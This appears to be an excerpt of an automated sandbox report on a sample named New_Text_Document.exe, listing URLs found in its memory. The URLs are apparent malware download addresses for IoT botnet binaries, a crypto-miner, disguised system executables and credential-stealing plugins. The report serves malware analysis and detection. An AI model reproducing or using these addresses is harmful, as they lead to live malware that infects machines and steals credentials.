                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.57.175.198:49177/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.63.246.15:63724/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.107.239.43:8026/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.143.28.78:32467/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.150.145.194:29197/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.199.175.162:24511/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.200.115.20:13720/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.231.226.35:27102/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.251.68.68:6369/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.43.42.10:37103/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.46.197.114:17739/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.5.200.222:38653/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/bins/sora.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://212.87.204.23/sora.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.101.143.200:42986/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.108.170.88:30361/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.14.187.153:57949/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.149.171.82:25039/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.151.40.153:21231/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.151.47.18:40414/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.16.63.103:38011/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.123.14/8bmeVwqx/Plugins/clip64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.226.123.14/8bmeVwqx/Plugins/cred64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.232.114.116/rengad.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.243.216.3:8480/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.33.204.186:1292/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.60.225.184:6579/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.7.223.212:44666/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.170.240.98:8805/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.183.54.169:47530/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.201.251:8104/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.129:38589/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.129:38589/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.134:42107/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.134:42107/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.134:42107/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.64:57245/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.244.203.64:57245/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://216.36.12.98:36165/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.11.75.162:7110/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.113.229.91:22935/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.114.43.149/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.128.133.5:16093/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.133.12.171:56476/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.144.173.240:2559/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.217/WatchDog.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.217/WinRing0x64.sys
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.217/conhost.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.217/svchost.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.217/xmrig.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.96.228/6d24030469a6b14b/msvcp140.dll
